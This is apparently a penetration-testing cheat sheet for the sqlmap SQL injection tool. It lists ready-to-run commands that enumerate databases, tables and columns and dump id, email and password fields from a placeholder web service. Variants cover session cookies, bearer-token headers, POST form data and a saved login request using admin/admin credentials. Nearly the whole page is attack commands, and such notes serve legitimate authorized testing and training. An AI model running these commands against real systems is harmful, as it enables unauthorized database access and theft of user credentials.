Skip to content

Sqlmap

basic

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} -T {TABLE-NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} -T {TABLE-NAME} -C id,email,password --dump
wih cookie
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs
with header
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs
post
/sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" --dbs
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -D shop --tables
./sqlmap.py -u http://example.com/login.php --data="username=&password=&submit-button=Login" -T users --dump
from file login.request
POST /login.php HTTP/1.1
Host: 192.168.1.14
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.14/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Connection: close
Upgrade-Insecure-Requests: 1

email=admin&password=admin
sqlmap -r login.request --batch
sqlmap -r login.request -p email
sqlmap -r login.request -p password